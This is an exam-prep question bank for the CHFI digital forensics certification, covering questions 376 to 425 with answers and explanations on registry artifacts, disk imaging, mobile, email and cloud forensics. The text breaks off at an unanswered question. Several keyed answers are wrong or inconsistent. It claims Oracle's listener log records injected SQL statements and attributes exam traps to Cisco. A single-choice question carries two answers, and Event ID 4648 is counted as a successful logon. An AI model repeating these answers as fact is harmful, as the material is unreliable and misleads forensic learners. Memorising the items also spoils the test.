Computer Hacking Forensic Investigator CHFI (CHFI) — Questions 376-450

1000 questions total · 14 pages · All types, answers revealed


Page 6 of 14

376
MCQ · easy

What is the primary goal of computer forensics?

A. To prosecute cybercriminals
B. To recover deleted files for data recovery
C. To identify, preserve, analyze, and present digital evidence in a legally acceptable manner
D. To secure the network from future attacks
Answer: C

This encompasses the entire forensic process.

Why this answer

Computer forensics aims to preserve evidence in its most original form, identify the root cause of an incident, and document the investigation for legal proceedings.

377
MCQ · easy

Which email header field is MOST reliable for identifying the true origin of an email, assuming no header tampering occurred at the initial MTA?

A. Received
B. Message-ID
C. From
D. DKIM-Signature
Answer: A

Received headers are added by each mail server and the earliest one usually contains the true originating IP.

Why this answer

The Received header chain shows the path the email took. The bottom-most Received header, the one added by the originating server and therefore the earliest in the chain, is the most reliable for identifying the original sender's IP.

378
MCQ · medium

A forensic examiner is analyzing an Android device and wants to extract the database containing the user's text messages (SMS). In which directory would the examiner typically find the SMS database on a non-rooted device?

A. /data/data/com.android.providers.contacts/databases/
B. /data/data/com.android.providers.calendar/databases/
C. /data/data/com.android.providers.downloads/databases/
D. /data/data/com.android.providers.telephony/databases/
Answer: D

mmssms.db is stored here.

Why this answer

The SMS database on Android devices is stored by the telephony provider, which manages SMS/MMS messages. On non-rooted devices, the database is located at /data/data/com.android.providers.telephony/databases/mmssms.db, as the package com.android.providers.telephony is the system application responsible for handling SMS and MMS operations.

Exam trap

EC-Council often tests the distinction between Android system packages; the trap here is confusing the telephony provider (SMS) with the contacts provider (call logs/contacts) or other providers, as candidates may incorrectly associate SMS with contacts due to their functional overlap in messaging apps.

How to eliminate wrong answers

Option A is wrong because com.android.providers.contacts manages contact data, not SMS messages; its databases contain contact information and call logs. Option B is wrong because com.android.providers.calendar handles calendar events and reminders, not SMS. Option C is wrong because com.android.providers.downloads manages download history and files, not SMS messages.

379
MCQ · hard

A forensic analyst finds a suspicious .plist file in /Library/LaunchDaemons/ on a macOS system. The file contains a key "ProgramArguments" with a path to a script in /tmp. Which persistence mechanism does this indicate?

A. Cron job
B. Launch daemon
C. Login item
D. Kernel extension
Answer: B

LaunchDaemons plists in /Library/LaunchDaemons/ define system daemons that run as root at boot.

Why this answer

LaunchDaemons are used for system-wide daemons that start at boot. A plist in /Library/LaunchDaemons/ with ProgramArguments indicates a launch daemon persistence mechanism.

380
Multi-Select · medium

Which TWO of the following are methods used to hide data within the NTFS file system?

Select 2 answers
A. USN Journal
B. File slack space
C. Volume Shadow Copy
D. Alternate Data Streams (ADS)
E. Encrypting File System (EFS)
Answers: B, D

Why this answer

ADS allows hiding data in streams attached to files, and slack space can hide data in unused bytes at the end of file clusters.

381
MCQ · medium

A security analyst reviews firewall logs and sees repeated outbound connections from an internal server to an external IP on port 443. The server is not supposed to initiate outbound connections. Which action should the analyst take FIRST?

A. Block the external IP at the firewall
B. Ignore the traffic as it is encrypted
C. Disable the server's network connection
D. Investigate the server for signs of compromise
Answer: D

Investigating the server will help determine if it is compromised and what actions to take.

Why this answer

The first step is to investigate the server to determine if it's compromised, as outbound connections could indicate C2 communication.

382
MCQ · hard

A forensic examiner needs to analyze the contents of a Windows prefetch file (.pf) to determine the last execution time of an application. Which tool would BEST accomplish this task?

A. prefetch.exe (built-in Windows tool)
B. ShellBags Explorer
C. PECmd
D. JumpLister
Answer: C

Correct. PECmd is the standard tool for parsing prefetch files.

Why this answer

Prefetch files contain metadata including last run time and run count. Tools like PECmd (from Eric Zimmerman's tools) are designed to parse .pf files forensically.

383
Multi-Select · medium

Which TWO of the following are hardware write blockers commonly used in forensic acquisitions?

Select 2 answers
A. EnCase
B. FastBloc
C. dd
D. Tableau
E. FTK Imager
Answers: B, D

FastBloc is a hardware write blocker by Guidance Software.

Why this answer

FastBloc (Option B) is a hardware write blocker produced by Guidance Software that operates at the physical layer, intercepting ATA/ATAPI commands to prevent any write operations from reaching the suspect drive. It ensures bit-for-bit forensic acquisition without altering the source data, which is essential for maintaining evidentiary integrity.

Exam trap

Cisco often tests the distinction between hardware write blockers (physical devices) and forensic software tools (like EnCase, FTK Imager, or dd), leading candidates to mistakenly select software that can perform acquisitions but does not provide hardware-level write protection.

384
MCQ · easy

Which principle states that every contact leaves a trace?

A. Locard's exchange principle
B. Chain of custody
C. Best evidence rule
D. Hearsay rule
Answer: A

Correct. This principle is fundamental in forensic science.

Why this answer

Locard's exchange principle is the foundational forensic concept stating that whenever two objects come into contact, there is a transfer of material between them. In computer forensics, this means that digital activity—such as accessing a file, sending a packet, or connecting to a network—inevitably leaves traces in logs, memory, registry entries, or file metadata. This principle underpins the entire discipline of digital evidence recovery.

Exam trap

EC-Council often tests the distinction between a forensic principle (Locard's) and legal or procedural rules (chain of custody, best evidence, hearsay), so candidates mistakenly select a legal term that sounds related to evidence handling rather than the core scientific concept.

How to eliminate wrong answers

Option B (Chain of custody) is wrong because it is a procedural documentation process that tracks the handling of evidence from collection to court presentation, not a principle about trace evidence. Option C (Best evidence rule) is wrong because it is a legal rule requiring original evidence (e.g., original hard drive rather than a copy) to be presented in court, not a statement about contact leaving traces. Option D (Hearsay rule) is wrong because it is a legal rule excluding out-of-court statements offered for the truth of the matter, unrelated to physical or digital trace evidence.

385
Multi-Select · hard

Which THREE of the following are indicators of a webshell on a compromised web server? (Select THREE.)

Select 3 answers
A. Multiple failed login attempts in auth.log
B. Presence of system commands in web server error logs
C. Unusual files with .asp, .php, or .jsp extensions in web directories
D. Outbound connections from the web server to suspicious IP addresses
E. High CPU usage from the web server process
Answers: B, C, D

Webshells may execute system commands, appearing in error logs if output is not sanitized.

Why this answer

Webshells are malicious scripts uploaded to a web server. Indicators include anomalous file modifications in web directories, unexpected processes from web server user accounts, and outbound connections from the web server to unknown IPs. CPU spikes can occur but are less specific.

386
MCQ · medium

A forensic analyst is examining a Windows system for evidence of a program that runs automatically every time the system starts. Which registry key is commonly used to achieve persistence via the 'Run' key?

A. HKLM\SAM\SAM
B. HKLM\Software\Microsoft\Windows\CurrentVersion\Run
C. HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon
D. HKLM\SYSTEM\CurrentControlSet\Services
Answer: B

Programs listed under this key run automatically at system startup.

Why this answer

The Run key under HKLM\Software\Microsoft\Windows\CurrentVersion\Run is a common location for programs to execute at startup. Similar keys exist in HKCU.

387
MCQ · hard

A security analyst runs a dynamic analysis of a suspected malware sample using Cuckoo Sandbox. The report shows that the sample created a mutex named 'Global\MyMaliciousMutex', added a registry run key under HKCU\Software\Microsoft\Windows\CurrentVersion\Run, and attempted to communicate with an IP address 185.10.68.12 on port 443. Which of the following is the BEST immediate indicator of compromise (IoC) to share with the threat intelligence team?

A. The registry run key location
B. The sample's MD5 hash
C. The IP address 185.10.68.12
D. The mutex name 'Global\MyMaliciousMutex'
Answer: C

The C2 IP address can be blocked at the firewall or added to threat intel feeds to prevent further communication.

Why this answer

The network C2 IP address is direct and actionable for blocklisting. Registry keys and mutex names can be used for detection but are less definitive for network defense.

388
MCQ · medium

A forensic analyst is investigating a Windows system for evidence of USB device usage. Which registry key is MOST useful for determining the first time a USB device was connected and its serial number?

A. HKLM\SYSTEM\CurrentControlSet\Enum\USBSTOR
B. HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2
C. HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\ShellBags
D. HKLM\SYSTEM\CurrentControlSet\Enum\USB
Answer: A

USBSTOR contains USB mass storage devices with serial numbers and timestamps.

Why this answer

The USBSTOR registry key under HKLM\SYSTEM\CurrentControlSet\Enum\USBSTOR contains subkeys for each USB device, with properties like serial number and first install date.

389
MCQ · hard

An investigator creates a forensic image using dcfldd with the following command: dcfldd if=/dev/sdb of=image.dd hash=sha256 hashwindow=10M hashlog=hash.txt. What is the effect of the 'hashwindow=10M' parameter?

A. It divides the output into 10 MB chunks and hashes each chunk, logging the results
B. It sets the input buffer size to 10 MB for performance
C. It verifies the hash of the input device in 10 MB windows before copying
D. It causes the tool to hash the entire image only after completion
Answer: A

This is the correct behavior; it enables piecewise verification.

Why this answer

Option A is correct because the `hashwindow=10M` parameter in dcfldd instructs the tool to compute a SHA-256 hash for every 10 MB segment (window) of the input data as it is being copied, and then log each segment's hash to the specified hashlog file. This allows the investigator to verify the integrity of individual chunks of the forensic image, which is useful for detecting corruption or tampering in specific regions of the image without rehashing the entire file.

Exam trap

Cisco often tests the distinction between 'hashing during acquisition' and 'hashing after completion' — the trap here is that candidates may assume `hashwindow` is for performance tuning (buffer size) or for pre-copy verification, rather than understanding it as a segmentation feature for incremental hashing and logging.

How to eliminate wrong answers

Option B is wrong because `hashwindow` does not control the input buffer size; dcfldd uses separate parameters (e.g., `bs=`) for block size and buffer settings, and `hashwindow` is specifically for segment-based hashing. Option C is wrong because `hashwindow` does not cause the tool to verify the hash of the input device before copying; it computes hashes of the output chunks during the copy process, not as a pre-copy verification step. Option D is wrong because `hashwindow=10M` causes hashing to occur incrementally during the imaging process, not only after completion; the `hashlog` file is populated as each 10 MB window is processed.

390
Multi-Select · medium

A forensic analyst is examining a Windows system for evidence of USB device usage. Which TWO registry locations are known to store USB device history?

Select 2 answers
A. HKLM\SYSTEM\CurrentControlSet\Enum\USBSTOR
B. HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2
C. HKLM\Software\Microsoft\Windows NT\CurrentVersion\Prefetch
D. HKCU\Software\Microsoft\Windows\CurrentVersion\Run
E. HKLM\SAM\SAM\Domains\Account\Users
Answers: A, B

USBSTOR lists all USB devices that have been connected.

Why this answer

USB device history is stored in USBSTOR and MountPoints2 keys.

391
MCQ · medium

A forensic analyst needs to create a timeline of file system activity from a disk image. Which tool is specifically designed for this purpose and can parse various artifacts such as registry, prefetch, and log files?

A. Wireshark
B. Volatility
C. Plaso (log2timeline)
D. FTK Imager
Answer: C

Plaso creates super timelines from multiple forensic artifacts.

Why this answer

Plaso (log2timeline) is a super timeline tool that parses multiple artifacts to create a comprehensive timeline. Wireshark is for network packets. FTK Imager is for acquisition. Volatility is for memory analysis.

392
Matching · medium

Match each file carving technique to its description.


Concepts
Matches

Uses file signatures to find start and end

Uses internal file structure metadata

Reassembles fragmented files

Uses statistical models to identify file types

Handles files split into two fragments

Why these pairings

These techniques recover files without filesystem metadata.

393
MCQ · easy

During a forensic investigation, the first responder arrives at a scene where a computer is powered on and a user is logged in. Which of the following is the MOST appropriate initial action?

A. Immediately power off the computer to prevent data alteration
B. Begin collecting data by copying all files to an external drive
C. Disconnect the computer from the network and take a photograph of the screen
D. Ask the user to save their work and then shut down normally
Answer: C

This preserves the current state and documents the scene, which is standard first responder procedure.

Why this answer

Securing the scene and documenting everything is the first priority to preserve evidence and ensure chain of custody. Powering off or accessing the system without proper documentation can lead to evidence spoliation.

394
MCQ · easy

In network forensics, which tool is commonly used to analyze and visualize NetFlow data to identify network traffic patterns?

A. Wireshark
B. Splunk
C. Nmap
D. SolarWinds NetFlow Traffic Analyzer
Answer: D

Specifically designed to collect and analyze NetFlow data.

Why this answer

SolarWinds NetFlow Traffic Analyzer is designed for NetFlow analysis. Wireshark is a packet analyzer, not a NetFlow analyzer. Nmap scans networks. Splunk can analyze logs but is not specifically a NetFlow tool.

395
MCQ · easy

Which of the following is a unique challenge in cloud forensics compared to traditional digital forensics?

A. Encryption of data at rest
B. Lack of network connectivity
C. Inability to acquire disk images
D. Multi-tenancy and data isolation
Answer: D

Multi-tenancy means evidence from one tenant may be co-mingled with others, complicating seizure and privacy.

Why this answer

Multi-tenancy (multiple customers sharing the same physical infrastructure) is a key challenge in cloud forensics because isolating evidence and maintaining data privacy across tenants is difficult.

396
MCQ · medium

A forensic analyst needs to collect evidence from a running Windows system without altering the system state. Which tool should they use to acquire volatile memory?

A. Wireshark
B. dd
C. DumpIt
D. Tableau write blocker
Answer: C

DumpIt is a memory acquisition tool for Windows.

Why this answer

DumpIt is a lightweight memory acquisition tool designed specifically for capturing the contents of volatile memory (RAM) on a running Windows system. It minimizes interaction with the system to avoid altering the memory state, making it ideal for forensic collection of live evidence.

Exam trap

EC-Council often tests the distinction between volatile memory acquisition and disk imaging, leading candidates to confuse tools like dd (for disks) with memory-specific tools like DumpIt.

How to eliminate wrong answers

Option A is wrong because Wireshark is a network protocol analyzer used for capturing and inspecting network traffic, not for acquiring volatile memory from a running system. Option B is wrong because dd is a disk imaging tool typically used for creating bit-for-bit copies of storage devices, not for capturing RAM contents, and it does not handle Windows memory structures natively. Option D is wrong because a Tableau write blocker is a hardware device used to prevent writes to storage media during acquisition, but it does not acquire volatile memory; it is used for forensic imaging of hard drives or SSDs.

397
MCQ · easy

An investigator needs to recover deleted files from a USB drive formatted with FAT32. Which of the following techniques would be most effective, assuming the files have not been overwritten?

A. Check the journal for recent changes
B. Examine the FAT for unallocated clusters and reconstruct files
C. Analyze the $MFT for orphaned entries
D. Use the 'foremost' tool to carve based on file signatures
Answer: B, D

Correct: In FAT32, the File Allocation Table can be used to chain clusters and recover files.

Why this answer

FAT32 stores directory entries that are marked as deleted but still contain file metadata; carving based on remnants of directory entries is effective.

398
MCQ · medium

In an Azure environment, an investigator needs to review actions performed by a specific user over the past 30 days. Which Azure service provides the necessary audit logs for this purpose?

A. Azure Activity Log
B. Azure Security Center
C. Azure Monitor
D. Azure AD Audit Logs
Answer: A

The Activity Log is the subscription-level audit log for Azure resource operations.

Why this answer

Azure Activity Logs record all control-plane events (create, update, delete) for Azure resources, including user actions.

399
Multi-Select · medium

Which THREE of the following are types of slack space that can contain hidden data on a hard disk?

Select 3 answers
A. Device Configuration Overlay
B. Host Protected Area
C. File slack
D. Volume slack
E. RAM slack
Answers: C, D, E

File slack is the unused space between the end of a file and the end of the last cluster.

Why this answer

File slack, volume slack, and RAM slack are types of slack space. HPA and DCO are hidden areas, not slack space.

400
MCQ · easy

A forensic analyst needs to acquire RAM from a live Linux system for memory analysis. Which tool is specifically designed for this purpose and can capture memory without rebooting?

A. FTK Imager
B. Volatility
C. LiME
D. dd
Answer: C

LiME (Linux Memory Extractor) is the standard tool for Linux memory acquisition.

Why this answer

LiME (Linux Memory Extractor) is a kernel module that allows acquisition of volatile memory from Linux systems. It loads into the kernel and dumps RAM to a file or over the network.

401
MCQ · medium

A security analyst is reviewing firewall logs and notices repeated connection attempts from an internal IP to an external server on TCP port 4444. The internal host is a web server. What is the MOST likely explanation?

A. The web server is serving HTTPS traffic on port 4444
B. The web server is performing DNS queries
C. The web server is being scanned for open ports
D. The web server has a reverse shell connection to a command-and-control server
Answer: D

Outbound connections on non-standard ports (like 4444) from a server often indicate a reverse shell.

Why this answer

Port 4444 is commonly associated with reverse shells (e.g., Metasploit default). A web server making outbound connections to an external server on port 4444 strongly suggests a reverse shell from the web server to a command-and-control (C2) server.

402
Multi-Select · hard

Which THREE of the following are essential steps in the incident response process as defined by NIST SP 800-61? (Select exactly 3.)

Select 3 answers
A. Vulnerability Assessment
B. Post-Incident Activity
C. Preparation
D. Detection and Analysis
E. Penetration Testing
Answers: B, C, D

This phase includes lessons learned and evidence retention.

Why this answer

Option B is correct because Post-Incident Activity is one of the four core phases in the NIST SP 800-61 incident response lifecycle. This phase includes lessons learned, evidence retention, and report generation to improve future response efforts. Without this step, the organization cannot close the loop on security incidents or refine their detection and response capabilities.

Exam trap

EC-Council often tests the distinction between proactive security activities (like vulnerability assessments and penetration testing) and the reactive incident response phases defined in NIST SP 800-61, leading candidates to mistakenly select those proactive options as part of the incident response process.

403
Multi-Select · medium

A malware analyst is performing static analysis on a suspicious PE file. Which TWO of the following are examples of anti-forensic techniques that the malware might use to hinder analysis? (Select TWO.)

Select 2 answers
A. Using TLS encryption for network communication
B. Packing or obfuscating the malicious code
C. Creating registry keys for persistence
D. Writing temporary files to the %TEMP% directory
E. Timestomping to modify file creation and modification timestamps
Answers: B, E

Packing obfuscates the code to evade signature detection and analysis.

Why this answer

Packing or obfuscating the malicious code (Option B) is a classic anti-forensic technique used to hinder static analysis. Packers compress or encrypt the original PE file's code and data, making it unreadable to disassemblers and signature-based scanners until the unpacking stub executes at runtime. This forces the analyst to perform dynamic analysis or manual unpacking, significantly increasing the time and complexity of the investigation.

Exam trap

EC-Council often tests the distinction between anti-forensic techniques (which actively hinder analysis) and common malware behaviors (which are forensic artifacts themselves), so candidates mistakenly select persistence or file-writing options as anti-forensic when they are actually evidence-creating actions.

404
MCQ · easy

During an iOS forensics investigation, an examiner wants to extract call history records from an iPhone backup. Which SQLite database file should be examined?

A. SMS.db
B. AddressBook.db
C. call_history.db
D. Calendar.sqlitedb
Answer: C

call_history.db contains call records.

Why this answer

In iOS forensics, call history records are stored in the SQLite database file named 'call_history.db' (or 'CallHistory.storedata' in newer iOS versions). This database contains tables such as 'call' and 'ZCALLRECORD' that log incoming, outgoing, and missed calls along with timestamps and durations. Examining this file directly from an iTunes backup or device extraction provides the examiner with the complete call log.

Exam trap

EC-Council often tests the specific naming of iOS forensic artifacts; the trap here is that candidates confuse 'SMS.db' (which stores messages) with call logs, or assume call history is stored in a more generic database like 'AddressBook.db'.

How to eliminate wrong answers

Option A is wrong because SMS.db stores SMS and iMessage conversations, not call history records. Option B is wrong because AddressBook.db (or Contacts.sqlitedb) stores contact names, phone numbers, and email addresses, but does not contain call logs. Option D is wrong because Calendar.sqlitedb stores calendar events and reminders, not telephony call records.

405
MCQ · hard

During a forensic examination of a solid-state drive (SSD), you notice that files deleted several months ago cannot be recovered using traditional file carving tools. Which SSD feature is MOST likely preventing recovery?

A. TRIM
B. Over-provisioning
C. Garbage Collection
D. Wear levelling
Answer: A

TRIM causes the SSD to erase freed blocks, preventing recovery of deleted files via file carving.

Why this answer

TRIM is a command that allows the operating system to inform the SSD which data blocks are no longer in use. When TRIM is enabled, the SSD internally erases those blocks, making file carving ineffective for deleted files.

406
MCQ · easy

A forensic analyst is examining a hard drive and needs to identify the number of sectors per track. Which component of the hard disk structure defines this?

A. Track
B. Sector
C. Cluster
D. Cylinder
Answer: A

Why this answer

A track is a circular division of data on a platter, and each track is divided into sectors. The number of sectors per track is a characteristic of the track itself.

407
MCQ · medium

In a corporate investigation, legal counsel issues a litigation hold to preserve electronically stored information (ESI) relevant to a lawsuit. Which of the following is the BEST description of a litigation hold?

A. A form of encryption used to protect evidence during transport.
B. A notice to employees to preserve all relevant ESI and cease routine deletion.
C. A technique used to acquire forensic images without altering the source.
D. A court order authorizing law enforcement to seize computers.
Answer: B

Litigation holds require organizations to preserve potentially relevant data.

Why this answer

A litigation hold is a legal directive to prevent spoliation of evidence by suspending normal data retention and deletion policies.

408
MCQ · easy

What is the primary goal of computer forensics?

A. To prevent future cyber attacks
B. To identify and prosecute cybercriminals
C. To preserve and analyze digital evidence in a legally admissible manner
D. To recover deleted files from a hard drive
Answer: C

This matches the definition of computer forensics.

Why this answer

The primary goal of computer forensics is to preserve and analyze digital evidence in a manner that is legally admissible in court.

409
MCQ · medium

In Windows registry forensics, which key is examined to identify USB devices that were connected to the system?

A. HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
B. NTUSER.DAT\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2
C. HKLM\SAM\SAM\Domains\Account\Users
D. HKLM\SYSTEM\CurrentControlSet\Enum\USBSTOR
Answer: D

USBSTOR enumerates USB storage devices connected to the system.

Why this answer

The USBSTOR key under HKLM\SYSTEM\CurrentControlSet\Enum\USBSTOR contains a list of all USB storage devices that have been connected, including their serial numbers.

410
MCQ · hard

During a forensic examination, an analyst runs the following command: 'dd if=/dev/sda of=/mnt/evidence/image.dd bs=4k conv=noerror,sync'. The source drive has bad sectors. What is the effect of the 'conv=noerror,sync' option?

A. It stops the imaging process when an error is encountered.
B. It skips the bad sectors and compresses the output.
C. It retries reading the bad sector multiple times before giving up.
D. It fills the bad sectors with zeros in the output image, allowing the imaging to complete without errors.
Answer: D

noerror continues on error, sync pads with zeros so the output size matches the input.

Why this answer

The 'noerror' option tells dd to continue reading after errors, and 'sync' pads the bad sectors with zeros to maintain the correct size.

411
MCQ · easy

Which of the following is a key difference between static analysis and dynamic analysis in malware forensics?

A. Static analysis requires the malware to be executed, while dynamic analysis does not.
B. Static analysis is used only for packed malware, while dynamic analysis is used for unpacked.
C. Dynamic analysis uses tools like IDA Pro, while static uses Cuckoo Sandbox.
D. Static analyzes the code without execution; dynamic executes the malware.
Answer: D

Correct distinction.

Why this answer

Option D is correct because static analysis involves examining the malware's code (e.g., disassembly, string extraction, hash analysis) without executing it, while dynamic analysis runs the malware in a controlled sandbox environment to observe its runtime behavior, such as file system changes, registry modifications, and network connections. This fundamental distinction is critical in malware forensics to safely understand the threat without risking infection.

Exam trap

EC-Council often tests the reversal of definitions (execution vs. non-execution) to catch candidates who confuse static and dynamic analysis roles.

How to eliminate wrong answers

Option A is wrong because it reverses the definitions: static analysis does NOT require execution, while dynamic analysis does. Option B is wrong because static analysis can be applied to both packed and unpacked malware (though packing complicates static analysis), and dynamic analysis works regardless of packing by observing runtime behavior. Option C is wrong because IDA Pro is a static analysis tool (disassembler/decompiler), while Cuckoo Sandbox is a dynamic analysis tool (automated malware execution environment); the option swaps their correct classifications.

412
MCQ · medium

During a cloud forensics investigation of an AWS environment, an analyst extracts CloudTrail logs and notices many events with the error code 'AccessDenied' for a specific IAM user attempting to list an S3 bucket. Which of the following is the most appropriate next step?

A. Review the IAM policies attached to the user to determine if the action was authorized
B. Immediately disable the IAM user account
C. Escalate the issue to law enforcement
D. Check the S3 bucket's access logs for the same IP address
Answer: A

Logs show AccessDenied, so the user is blocked, but reviewing policies helps understand intent and whether policies are misconfigured.

Why this answer

AccessDenied indicates the user lacks permissions; check IAM policies to see if the user should have access or if it's an unauthorized attempt.

413
MCQ · easy

A forensic analyst is investigating a compromised web application that uses an Oracle database. The analyst suspects that SQL injection was used to extract sensitive data. Which Oracle log source would provide evidence of the injected SQL statements?

A. Control file
B. Redo log files
C. Listener log (listener.log)
D. Alert log (alert_SID.log)
Answer: C

With audit enabled, the listener log can capture SQL statements.

Why this answer

The listener.log is the correct source because Oracle's listener records all client connections and SQL*Net traffic, including the raw SQL statements sent to the database. When SQL injection is performed, the injected payload is transmitted as part of the SQL query over the network, and the listener log captures these exact statements, providing direct evidence of the attack.

Exam trap

EC-Council often tests the misconception that redo logs or alert logs capture SQL statements, when in fact only the listener log records the actual SQL text sent over the network, while redo logs store only the resulting data changes and alert logs store administrative events.

How to eliminate wrong answers

Option A is wrong because the control file stores metadata about the physical structure of the database (datafile locations, checkpoint information) and does not log SQL statements. Option B is wrong because redo log files record changes made to data blocks for recovery purposes, not the original SQL text that caused those changes. Option D is wrong because the alert log (alert_SID.log) records significant database events (startups, shutdowns, errors) and administrative actions, but does not capture the actual SQL statements executed by users or applications.

414
MCQmedium

An analyst finds evidence that an attacker used steganography to hide data within image files on the suspect's computer. Which of the following tools is MOST appropriate for detecting steganography in these images?

A.Foremost
B.Autopsy
C.Stegdetect
D.Volatility
AnswerC

Stegdetect is designed to detect steganography in images.

Why this answer

StegExpose, StegDetect, or tools like `stegsolve` can detect steganography. Among the options, `stegdetect` is a known tool for detecting steganography in JPEG images.

415
MCQmedium

In an Azure environment, a forensic analyst needs to identify which user assigned a specific role to another user, leading to privilege escalation. Which Azure log should the analyst examine?

A.Azure AD Sign-In Logs
B.Azure Activity Log
C.Azure Diagnostic Logs
D.Azure Network Watcher Logs
AnswerB

Azure Activity Log records all control-plane events, including role assignments and changes to IAM policies.

Why this answer

Azure Activity Log captures all write operations (PUT, POST, DELETE) on Azure resources, including role assignments, making it the primary source for investigating privilege escalation.

416
Multi-Selecthard

A security analyst captures network traffic and observes multiple TCP SYN packets sent to a range of IP addresses on port 445, followed by TCP RST packets after 15 seconds. Which THREE indicators suggest this is a network scan?

Select 3 answers
A.The packets are sent to sequential IP addresses in the same subnet
B.No TCP three-way handshake completes for these connections
C.The source IP is from an internal address
D.The same port is targeted across multiple IP addresses
E.The payload contains exploit code for SMB vulnerability
AnswersA, B, D

Scanning often targets sequential or random IPs to find live hosts.

Why this answer

TCP SYN packets to multiple IPs on a single port indicate a port scan. The RST packets after a timeout suggest the targets did not respond, which is common in a sweep. Sequential IPs and the use of port 445 (SMB) are typical of scanning.

The lack of established connections and the specific pattern confirm scanning.

417
MCQmedium

An email investigator receives a suspicious email and examines the headers. The 'Received-SPF: pass (google.com: domain of example.com designates 203.0.113.5 as permitted sender)' header is present. However, the 'From' address is 'admin@example.com' and the 'Return-Path' is 'admin@example.com'. What does this indicate?

A.The email passed SPF alignment for the domain example.com
B.The email originated from 203.0.113.5
C.The email failed SPF check
D.The email is definitely legitimate
AnswerA

SPF pass indicates the sending IP is authorized; alignment with From domain is satisfied.

Why this answer

SPF check passed for the domain example.com, meaning the sending server (203.0.113.5) is authorized. This suggests the email is not spoofed from that domain, at least from SPF perspective.

418
MCQhard

During a cloud forensic investigation, the analyst discovers that the suspect used AWS IAM credentials to launch unauthorized EC2 instances. The suspect claims the credentials were stolen. Which log would the analyst examine to determine the source IP address from which the credentials were used?

A.VPC Flow Logs
B.Amazon Inspector findings
C.AWS Config
D.AWS CloudTrail
AnswerD

CloudTrail logs API calls with source IP.

Why this answer

AWS CloudTrail logs all API calls, including the source IP address of the request. By analyzing CloudTrail events for the RunInstances API, the analyst can see the IP address.

419
MCQmedium

A forensic analyst discovers an unusual entry in the Windows Registry under 'HKCU\Software\Microsoft\Windows\CurrentVersion\Run'. Which persistence mechanism does this represent?

A.Registry Run key persistence
B.Service installation
C.Scheduled task
D.Startup folder
AnswerA

The Run key automatically launches programs at user logon, a common persistence mechanism.

Why this answer

The Run key is a standard location for programs to auto-start when a user logs on. A malicious entry here indicates persistence via registry run keys.

420
MCQeasy

What is the primary purpose of maintaining a chain of custody during a forensic investigation?

A.To document the handling of evidence from collection to presentation in court
B.To reduce the size of evidence for easier storage
C.To analyze the evidence for hidden data
D.To encrypt the evidence to prevent unauthorized access
AnswerA

Chain of custody provides a clear record of evidence handling, ensuring admissibility.

Why this answer

The primary purpose of maintaining a chain of custody is to create a documented, unbroken record of every person who handled the evidence, from the moment it is collected until it is presented in court. This documentation is critical to establish the authenticity and integrity of the evidence, ensuring it has not been tampered with or altered, which is a foundational requirement for admissibility under legal standards like the Federal Rules of Evidence (FRE) 901. Without a proper chain of custody, the evidence can be challenged as inadmissible due to lack of trustworthiness.

Exam trap

EC-Council often tests the distinction between the chain of custody's documentation purpose and other forensic activities like analysis or security, so candidates mistakenly choose options that describe evidence handling steps (e.g., encryption or analysis) rather than the core legal documentation requirement.

How to eliminate wrong answers

Option B is wrong because reducing the size of evidence for easier storage is not a forensic goal; it would actually destroy or compress data, potentially losing critical metadata and violating the principle of maintaining evidence in its original state. Option C is wrong because analyzing evidence for hidden data is a separate investigative step (e.g., using tools like FTK or EnCase for steganography detection), not the purpose of the chain of custody, which is purely about documenting handling. Option D is wrong because encrypting evidence to prevent unauthorized access is a security measure, not a documentation process; encryption can even complicate chain of custody if the key is not properly managed, and the chain of custody itself does not involve cryptographic operations.

421
MCQeasy

Which tool is commonly used to analyze email headers and trace the path of an email across servers by parsing 'Received' fields?

A.EmailTrackerPro
B.Wireshark
C.Volatility
D.FTK Imager
AnswerA

EmailTrackerPro parses email headers and maps the route of an email.

Why this answer

EmailTrackerPro is specifically designed to analyze email headers and trace the path of an email.

422
Multi-Selectmedium

Which TWO Windows Event IDs are associated with successful logon events? (Select two.)

Select 2 answers
A.4648
B.4624
C.4625
D.7045
E.4720
AnswersA, B

4648 = A logon was attempted using explicit credentials (successful).

Why this answer

Event ID 4624 indicates successful logon; 4648 indicates a logon using explicit credentials (also successful).

423
MCQeasy

An Android phone is seized, and the forensic examiner needs to acquire the device in a forensically sound manner. The phone is running Android 12 and has USB debugging enabled. Which acquisition method provides the most complete data without physically modifying the device?

A.File system acquisition via Cellebrite UFED
B.Physical acquisition via ADB with appropriate exploit
C.Logical acquisition through ADB backup
D.Manual extraction using screen captures
AnswerB

Physical acquisition via ADB (e.g., using dd or a custom recovery) can obtain a full physical image, providing the most comprehensive data.

Why this answer

Option B is correct because physical acquisition via ADB with an appropriate exploit allows the examiner to obtain a complete bit-for-bit copy of the device's flash memory, including deleted data and unallocated space, without physically modifying the device. Since Android 12 has USB debugging enabled, ADB can be used to push an exploit that bypasses security restrictions to perform a physical dump, which is the most comprehensive method available for this scenario.

Exam trap

EC-Council often tests the misconception that file system acquisition via Cellebrite UFED is the most complete method, but candidates must remember that physical acquisition captures raw flash memory including deleted data, whereas file system acquisition only retrieves active files.

How to eliminate wrong answers

Option A is wrong because Cellebrite UFED file system acquisition typically extracts only the file system structure (files and directories) and does not capture raw flash memory or unallocated space, missing deleted data and hidden partitions. Option C is wrong because logical acquisition through ADB backup only retrieves app data and system settings specified by the backup API, not the entire device storage, and it cannot recover deleted files or raw disk images. Option D is wrong because manual extraction using screen captures is not a forensic acquisition method; it only captures visible screen content and provides no access to underlying data, making it forensically unsound and incomplete.

424
Multi-Selecthard

A GCP audit log shows a project owner granted 'iam.serviceAccountUser' role to a service account from a different project. Which TWO potential security implications should the investigator prioritize?

Select 2 answers
A.The service account can be used to escalate privileges by attaching it to resources
B.The audit logging is now disabled for that service account
C.The service account's keys are automatically rotated
D.Cross-project access may allow lateral movement
E.The service account can now impersonate any user in the project
AnswersA, D

With the role, the service account can be attached to resources, gaining its permissions.

Why this answer

This privilege escalation allows the service account to impersonate other accounts and potentially access resources across projects.

425
MCQmedium

A forensic analyst is testifying as an expert witness in court. The opposing counsel challenges the analyst's testimony based on the Frye standard. What does the Frye standard require for scientific evidence to be admissible?

A.The evidence must have been obtained with a warrant.
B.The evidence must be relevant and more probative than prejudicial.
C.The evidence must have been peer-reviewed and published.
D.The evidence must be based on techniques generally accepted in the scientific community.
